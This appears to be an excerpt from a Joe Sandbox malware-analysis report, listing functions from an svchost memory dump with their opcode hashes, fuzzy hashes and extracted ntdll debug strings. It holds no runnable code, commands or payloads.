                                                                    Function 03672F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction ID: 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24
                                                                    • Opcode Fuzzy Hash: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction Fuzzy Hash: 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                                                    Function 03672FE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                                                    • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                                                    Function 03672FA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                                                    • Instruction ID: 08ba8383abdcda55cd4713981f4300cb836be1f6ecaf7edb84538028a7d6f747
                                                                    • Opcode Fuzzy Hash: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                                                    • Instruction Fuzzy Hash: 9C90023120180802D100B6584848787000687D4302F95C111A5164659F87A5C9916531
                                                                    Function 03672FB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction ID: 6005ef6f093c2f0f46cd85166790aa9ef261c7d3b9e208cde4e5076d827fb4b6
                                                                    • Opcode Fuzzy Hash: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction Fuzzy Hash: ED900221601404424140B66888849464006ABE5311795C221A0998654E869989655665
                                                                    Function 03672F90 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                                                    • Instruction ID: 3aa003d67dcc11ba95c3e0c244e3ac4b03cce96cb405c8ed2288800ee14a5ad2
                                                                    • Opcode Fuzzy Hash: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                                                    • Instruction Fuzzy Hash: FB90023120180802D100B658485474B000687D4302F95C111A1164659E876589516571
                                                                    Function 03672E30 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                                                    • Instruction ID: ac9a55e02d3ca15807a57236cef1689dc94ddc8aecbb1cf2f8b764d3eb27591c
                                                                    • Opcode Fuzzy Hash: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                                                    • Instruction Fuzzy Hash: DB90022130140802D102B6584454646000AC7D5345FD5C112E1424659E87658A53A132
                                                                    Function 03672EE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction ID: 2009c4b21c502db950d934bcdac7fa63bf7a7341f15f1866729f363aeed19f2c
                                                                    • Opcode Fuzzy Hash: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction Fuzzy Hash: 3990026120180803D140BA584844647000687D4302F95C111A2064659F8B698D516135
                                                                    Function 03672EA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                                                    • Instruction ID: 0b88e1cda8a68370aea70bd6f0237e7b1c857bb963b2a18813f875aa3ddde019
                                                                    • Opcode Fuzzy Hash: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                                                    • Instruction Fuzzy Hash: DD90027120140802D140B6584444786000687D4301F95C111A5064658F87998ED56665
                                                                    Function 03672E80 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction ID: a6601a38d3994d050a93b4310d5cfa758d354a5252bd310f3d630d69f2eca991
                                                                    • Opcode Fuzzy Hash: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction Fuzzy Hash: 8E90022160140902D101B6584444656000B87D4341FD5C122A1024659FCB658A92A131
                                                                    Function 03673D70 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                                                    • Instruction ID: b5c75c6b0858e1d826eefaf0b3a12823685a81f004b5b2af19a0b9a98123ae75
                                                                    • Opcode Fuzzy Hash: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                                                    • Instruction Fuzzy Hash: 3F90023520140802D510B6585844686004787D4301F95D511A042465CE879489A1A121
                                                                    Function 03672D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction ID: 550db0ed94396a8b97b0d23723babb47a8ca8f19d5d513dc8a3aec6ce304e473
                                                                    • Opcode Fuzzy Hash: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction Fuzzy Hash: 2F90022130140403D140B65854586464006D7E5301F95D111E0414658DDA5589565222
                                                                    Function 03672D00 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                                                    • Instruction ID: e94c90bdc3197e2306ab4c24857d614b78746af37834f9dfb48ed2615b8d33ab
                                                                    • Opcode Fuzzy Hash: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                                                    • Instruction Fuzzy Hash: BD90022120544842D100BA585448A46000687D4305F95D111A1064699EC7758951A131
                                                                    Function 03672D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction ID: eb3b26cc62c91c58aa2bcf805b03df034cd8fd138102a157ab3551ec396ee687
                                                                    • Opcode Fuzzy Hash: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction Fuzzy Hash: 7390022921340402D180B658544864A000687D5302FD5D515A001565CDCA5589695321
                                                                    Function 03673D10 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                                                    • Instruction ID: ad16e4712f401959e33ff3f40102739bbbe3a81c3a51bfd54614708970c35028
                                                                    • Opcode Fuzzy Hash: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                                                    • Instruction Fuzzy Hash: 38900231202405429540B7585844A8E410687E5302BD5D515A0015658DCA5489615221
                                                                    Function 03672DD0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction ID: 3cd3554952be4e277cf9caf681f4d01bb0d632706e383e7fb4c57cb3c80cca1e
                                                                    • Opcode Fuzzy Hash: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction Fuzzy Hash: DE900221242445525545F6584444547400797E43417D5C112A1414A54D86669956D621
                                                                    Function 03672DB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                                                    • Instruction ID: c0a3e2716ec8ae41761c3557174784ccfb59649f7173eb5b1e8d1de5d590b5a2
                                                                    • Opcode Fuzzy Hash: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                                                    • Instruction Fuzzy Hash: B490023124140802D141B6584444646000A97D4341FD5C112A0424658F87958B56AA61
                                                                    Function 03672C60 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                                                    • Instruction ID: a73d70b26dc13e65620a629f34f1aa02e7663319655713b10b705c0158acf1b1
                                                                    • Opcode Fuzzy Hash: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                                                    • Instruction Fuzzy Hash: 1890023120140C42D100B6584444B86000687E4301F95C116A0124758E8755C9517521
                                                                    Function 03672C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                                                    • Instruction ID: 57c9decabb3b232f45a361f624714e0ec6778d0d7793dceab87a2f73d3ff40a1
                                                                    • Opcode Fuzzy Hash: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                                                    • Instruction Fuzzy Hash: 5890023120148C02D110B658844478A000687D4301F99C511A442475CE87D589917121
                                                                    Function 03672CF0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                                                    • Instruction ID: 18c4a8923d9017b505c535c34a9086cceea6c34b9e5366c63e0909e620ee77c9
                                                                    • Opcode Fuzzy Hash: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                                                    • Instruction Fuzzy Hash: 6190023120140803D100B6585548747000687D4301F95D511A042465CED79689516121
                                                                    Function 03672CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                                                    • Instruction ID: 48922546de11365eb2e63827ff35ded3a45b52560a1eb52c2694c6cd9b21ee5b
                                                                    • Opcode Fuzzy Hash: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                                                    • Instruction Fuzzy Hash: A590022160540802D140B6585458746001687D4301F95D111A0024658EC7998B5566A1
                                                                    Function 03672CA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                                    • Instruction ID: 4947b2c852d1bbb9d6bcd5b7e1280a91f65a64248abaac80ad49a95163ad975f
                                                                    • Opcode Fuzzy Hash: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                                    • Instruction Fuzzy Hash: 5290023120140802D100BA985448686000687E4301F95D111A5024659FC7A589916131
                                                                    Function 03672C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 829bb9b762ae8f925790c83f671aa4208fa631a060d9be7762ffabc54cb6b263
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 03672890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                                    • Instruction ID: 282589b5143b222d48a16e6871b8351cf7c825e08d96a27db41d0a5a55bc5096
                                                                    • Opcode Fuzzy Hash: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                                    • Instruction Fuzzy Hash: 2F51D9B5A04516BFCB10DF9DC9A097EF7B8BB08200B58866AE4A5D7741D334DE44CBE4
                                                                    Function 03667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                                                    • Execute=1, xrefs: 036A4713
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                                                    • ExecuteOptions, xrefs: 036A46A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                                    • Instruction ID: 05985d717170dcfd592e2691e2d81588a5619331c743dbb5f3b07073dd2b2b65
                                                                    • Opcode Fuzzy Hash: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                                    • Instruction Fuzzy Hash: 76514935A003097ADF21EBA9DC89FAE77B8EF05348F0800ADD505EB291EB719E518F54
                                                                    Function 0367B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: 4d750a17a3fadbc85023cf9ac478ac7b3aee9617a1255f6828546db23ea22687
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: FA81F170E052499EDF28CF68C9957FEBBB6AF45320F9C425ED861AB390C7308851CB54
                                                                    Function 0365F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                                                    • RTL: Re-Waiting, xrefs: 036A031E
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                                                    • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                                                    Function 0366BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                                                    • RTL: Resource at %p, xrefs: 036A7B8E
                                                                    • RTL: Re-Waiting, xrefs: 036A7BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                                                    • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                                                    Function 0366B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                                                    • RTL: Resource at %p, xrefs: 036A72A3
                                                                    • RTL: Re-Waiting, xrefs: 036A72C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                                                    • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                                                    Function 03677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
